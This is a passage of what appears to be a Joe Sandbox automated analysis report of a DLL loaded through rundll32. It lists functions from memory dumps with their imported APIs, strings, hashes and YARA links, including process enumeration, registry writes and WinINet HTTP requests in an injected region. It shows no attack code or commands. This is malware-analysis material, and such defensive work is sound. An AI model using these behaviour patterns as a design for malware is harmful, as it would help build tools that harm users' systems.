Uniqueness Score: -1.00%

Function 0000000180064338 Relevance: 9.1, APIs: 6, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0000000180064372
GetFileSize.KERNEL32 ref: 0000000180064394
GetFileSize.KERNEL32 ref: 00000001800643A2
ReadFile.KERNEL32 ref: 00000001800643DE
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180064406
CloseHandle.KERNEL32 ref: 000000018006440F

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: File$Size$CloseCreateHandleRead
String ID:
API String ID: 1601809017-0
Opcode ID: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
Instruction ID: 513f97a3dac13d024bc23301dce07c49bc5a225dcf8c593d0dc48b4e525c804c
Opcode Fuzzy Hash: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
Instruction Fuzzy Hash: 2E21803260475487E7819F2AE8443997BA1F788FD0F658225EF6547BA4DF38C64ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004CD44 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 000000018004CDF5
??2@YAPEAX_K@Z.MSVCRT ref: 000000018004CE1A
??3@YAXPEAX@Z.MSVCRT ref: 000000018004D181

Strings

Num_Catalog_Entries, xrefs: 000000018004CD4A
Catalog_Entries, xrefs: 000000018004CD48

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@$??3@
String ID: Catalog_Entries$Num_Catalog_Entries
API String ID: 1245774677-781996053
Opcode ID: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
Instruction ID: 9fcea3ce77e1ed4f5330bab62f44b4aa9bf918aefdaa2edac95f8aa4354510da
Opcode Fuzzy Hash: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
Instruction Fuzzy Hash: E6C14132205F8481DAA1CF15F98039EB3A4F789BE4F598625EAED47B98CF38C155C744

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004687C Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 248COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 0000000180046A22
??2@YAPEAX_K@Z.MSVCRT ref: 0000000180046A67

Strings

Num_Catalog_Entries, xrefs: 0000000180046924
Catalog_Entries, xrefs: 0000000180046922

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@??3@
String ID: Catalog_Entries$Num_Catalog_Entries
API String ID: 1936579350-781996053
Opcode ID: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
Instruction ID: d1be57a1d71c98b0b77dd863bddb056ffd98aca7a61043883bc55f1bcd24f70e
Opcode Fuzzy Hash: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
Instruction Fuzzy Hash: 46A1CB72B01F5882EA55DF25D98439C33A4E708BF8F1A8315EA68477E4EF34C69AC345

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040418 Relevance: 8.9, APIs: 7, Instructions: 155sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004048F
LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404A5
LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404DD
EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040553
LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040569
LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800405A1
Sleep.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004061C

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Sleep
String ID:
API String ID: 950586405-0
Opcode ID: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
Instruction ID: e5e3152c6d786b815c8bb063f8079f541e8d353448f2aaa10215c0b82b1e43f2
Opcode Fuzzy Hash: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
Instruction Fuzzy Hash: E8618C31301A4892FAD69B21EC943DA23A4F78DBE9F66C515ED6A572A1CF38C74DC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010990 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32 ref: 0000000180010A0B
RegSetValueExW.ADVAPI32 ref: 0000000180010AF9
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180010B02
RegCloseKey.ADVAPI32 ref: 0000000180010B0C

Strings

360scan, xrefs: 00000001800109E5

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CloseCreateValue
String ID: 360scan
API String ID: 1818849710-2450673717
Opcode ID: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
Instruction ID: 36ede12e68d324247f48980037de7b94a87db2de9e86c0014956a12bc0703eb2
Opcode Fuzzy Hash: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
Instruction Fuzzy Hash: 4341B132714B9885F7928B75D8503DC2B70BB8CBE8F549215EEA953BA5DF78C24AC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008224 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180008249
GetProcAddress.KERNEL32 ref: 0000000180008262
RegCreateKeyExW.ADVAPI32 ref: 00000001800082FB

Strings

RegCreateKeyTransactedW, xrefs: 0000000180008258
Advapi32.dll, xrefs: 0000000180008242

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCreateHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW
API String ID: 1964897782-2994018265
Opcode ID: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
Instruction ID: ad22b3d90bad73cc844585d5212e8c39d9a41fcfaef769d6902fd1eabb8e997b
Opcode Fuzzy Hash: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
Instruction Fuzzy Hash: 77210C32619B8482EBA1CB55F8547AAB7A0F7C8BD4F149115EACD07B68CF7CC248CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E2D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018000E31F
GetModuleFileNameW.KERNEL32 ref: 000000018000E341
PathAppendW.SHLWAPI ref: 000000018000E385

Strings

cloudcfg.dat, xrefs: 000000018000E379
..\Config\cloudcfg.dat, xrefs: 000000018000E350

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AppendFileModuleNamePathmemset
String ID: ..\Config\cloudcfg.dat$cloudcfg.dat
API String ID: 1620117007-2349577946
Opcode ID: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
Instruction ID: ddd92409ecb0ccec80f2ab3f904b9d803dc2e3fbc70a3a57e8900bd834cf0119
Opcode Fuzzy Hash: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
Instruction Fuzzy Hash: DD216F71204A8881EA91DB11E8443DE7360F78ABD9F90C211FA9947AE9DF7DC74DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074A30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000000180074A58
GetProcAddress.KERNEL32 ref: 0000000180074A6E
FreeLibrary.KERNEL32 ref: 0000000180074A87

Strings

mscoree.dll, xrefs: 0000000180074A4F
CorExitProcess, xrefs: 0000000180074A67

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c2f829957779a5f3283623a795060286876ebd1f64ff5d399dec1781f672f9f2
Instruction ID: e395451e8db6c2212d1c7d058d3e5d590d561a96988dee0adbc21a3ed47a46ec
Opcode Fuzzy Hash: c2f829957779a5f3283623a795060286876ebd1f64ff5d399dec1781f672f9f2
Instruction Fuzzy Hash: 3CF0903120070491EEA28B64A84439A2360FB8C7E1F548619E67A4A2F4CF3DC34DC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018AE8 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 000000018004388C: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043AB7

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018C88
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018CA9

Part of subcall function 0000000180044250: EnterCriticalSection.KERNEL32 ref: 0000000180044280
Part of subcall function 0000000180044250: LeaveCriticalSection.KERNEL32 ref: 00000001800442BA

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018E36

Part of subcall function 0000000180042ADC: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042B9A

Part of subcall function 0000000180018AE8: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180018C64

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$??3@EnterLeave
String ID:
API String ID: 3906572401-0
Opcode ID: 8704770b73637da07f2765808fbc5d80e4dde8a3e535cddf5f679fa9373d9d11
Instruction ID: 485792f3aa206c277c5c0904b00aba5ea33dd2ed139350c249341fca4c3fabed
Opcode Fuzzy Hash: 8704770b73637da07f2765808fbc5d80e4dde8a3e535cddf5f679fa9373d9d11
Instruction Fuzzy Hash: 5CB15732B05B448AEB51CFA0A8407DD33F5F748798F144526EE9867B88DF34C65AD354

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE14D8 Relevance: 7.7, APIs: 5, Instructions: 176processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00000235B5CE14FA
Process32First.KERNEL32 ref: 00000235B5CE1548
wsprintfA.USER32 ref: 00000235B5CE1693
wsprintfA.USER32 ref: 00000235B5CE172D
Process32Next.KERNEL32 ref: 00000235B5CE184F

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 4137211488-0
Opcode ID: 5ae15c8b8c9fac1bc2260a3d73dec5e15d910bbb577535e29febeca4dfee412a
Instruction ID: 9682d6c7f0e7acf6fa986e15306915c2838550cec26a34d43106ebde625aa570
Opcode Fuzzy Hash: 5ae15c8b8c9fac1bc2260a3d73dec5e15d910bbb577535e29febeca4dfee412a
Instruction Fuzzy Hash: 00911B32259FD096DA64DB14E44839AF3A7F784388F501925AA8D43BACDF3CD659CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070F00 Relevance: 7.7, APIs: 5, Instructions: 174COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180070F36

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 8b2e5358ef7994b7672dda4e212676a9332a6cdbfea30cd8ee4f2d86f2200a94
Instruction ID: 273587a47ae5326c80e6ba55da8392b357747b6508265d18e5e13f97f53468fd
Opcode Fuzzy Hash: 8b2e5358ef7994b7672dda4e212676a9332a6cdbfea30cd8ee4f2d86f2200a94
Instruction Fuzzy Hash: 7471A572204B88CAE7AA8F19A4403EE77A4FB887D4F148115FE9947BD4DF3AC604C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE5030 Relevance: 7.6, APIs: 5, Instructions: 122networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET ref: 00000235B5CE5168
HttpOpenRequestA.WININET ref: 00000235B5CE51E8
InternetSetOptionA.WININET ref: 00000235B5CE5227
HttpSendRequestA.WININET ref: 00000235B5CE5273
HttpSendRequestA.WININET ref: 00000235B5CE5294

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpRequest$OpenSend$InternetOption
String ID:
API String ID: 664753792-0
Opcode ID: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
Instruction ID: 07995d05b0c5032be1ceffd411d6e7178f152ea7acdb615eaf4efea34e9e2655
Opcode Fuzzy Hash: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
Instruction Fuzzy Hash: 3D61E576549F9086E765CB14F44839AF7A2F388788F500826EA8E43B6CDF7DD648CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016CA8 Relevance: 7.6, APIs: 5, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 0000000180016D26
??2@YAPEAX_K@Z.MSVCRT ref: 0000000180016D4B
memmove.MSVCRT(?,?,?,0000000180016E29), ref: 0000000180016D69
??3@YAXPEAX@Z.MSVCRT ref: 0000000180016DA1
memmove.MSVCRT(?,?,?,?,?,?,?,0000000180016E29), ref: 0000000180016E10

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@memmove$??3@
String ID:
API String ID: 232491532-0
Opcode ID: 36aecff153c17e78cc281762afab7df910fd19be64e25fb5c31b0b5d4ec441f6
Instruction ID: 28467c757ab6f7ef32b6ddf95ff48fc265dfbbceda238bfa6dff49904db51385
Opcode Fuzzy Hash: 36aecff153c17e78cc281762afab7df910fd19be64e25fb5c31b0b5d4ec441f6
Instruction Fuzzy Hash: 0C41C432B05B8881EF568B16F9403996361E748BE0F548725AB7A07BE9DF78C6958340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A658 Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

_swprintf_c_l.LIBCMT ref: 000000018006A6B0
memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A6DB
memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A755

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$_swprintf_c_l
String ID:
API String ID: 3930809162-0
Opcode ID: 4d957fd311e85dbc9e9e1d2fcdfd49009c8516e907acacc0d6bfdbff04455b87
Instruction ID: 2e3324a3b5d682f35c297bfefc02d538748b26edc97be9d81ac6111acbd6bae8
Opcode Fuzzy Hash: 4d957fd311e85dbc9e9e1d2fcdfd49009c8516e907acacc0d6bfdbff04455b87
Instruction Fuzzy Hash: 0A41E33231875496EBA5DA26D90079A67A2BB4DBC0F248015AF1A43F41DE35D6688B40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180044CE4 Relevance: 7.6, APIs: 6, Instructions: 110COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180044D24
LeaveCriticalSection.KERNEL32 ref: 0000000180044D3A
LeaveCriticalSection.KERNEL32 ref: 0000000180044D71
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180044EED), ref: 0000000180044DDC
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180044EED), ref: 0000000180044DF2
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180044EED), ref: 0000000180044E29

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
Instruction ID: 73bd4c9cd9396375e0c1b942217bf14bfc10cb3082dae23d56ea31479293823c
Opcode Fuzzy Hash: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
Instruction Fuzzy Hash: 19413932641B0896FA869F21EC943E83764F749FD9F598115EAA50B3A5CF28C74EC304

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016090 Relevance: 7.6, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 000000018001611F
??2@YAPEAX_K@Z.MSVCRT ref: 0000000180016144
memmove.MSVCRT(?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 000000018001616B
??3@YAXPEAX@Z.MSVCRT ref: 00000001800161A1
memmove.MSVCRT(?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800161AB

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@memmove$??3@
String ID:
API String ID: 232491532-0
Opcode ID: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
Instruction ID: 3308181ea52ff5a0dd97f5d36b69886329373971ad435e2f25c4df82c4de258d
Opcode Fuzzy Hash: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
Instruction Fuzzy Hash: 8231D332705B8894EF5ACF16D9443986362F709FE0F588615EE6E07BE6DE78D299C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800161EC Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 0000000180016298
memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162A6
??3@YAXPEAX@Z.MSVCRT ref: 00000001800162DE
memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162E8
memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162F6

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$??3@
String ID:
API String ID: 2321372689-0
Opcode ID: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
Instruction ID: b2b38ff55e60cbfe57fc328909b4bad170525be2db7207aa5bf6da73de3f6202
Opcode Fuzzy Hash: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
Instruction Fuzzy Hash: 7831D272700A8891DB569F12E9043DE6351F748FD0F948522EF5E4BBA6DE3CC259C300

Uniqueness

Uniqueness Score: -1.00%

